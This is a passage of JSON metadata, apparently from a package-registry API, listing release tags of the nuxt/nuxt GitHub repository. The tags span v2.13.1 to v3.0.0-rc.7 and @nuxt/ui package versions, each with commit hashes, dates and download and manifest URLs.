t/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.m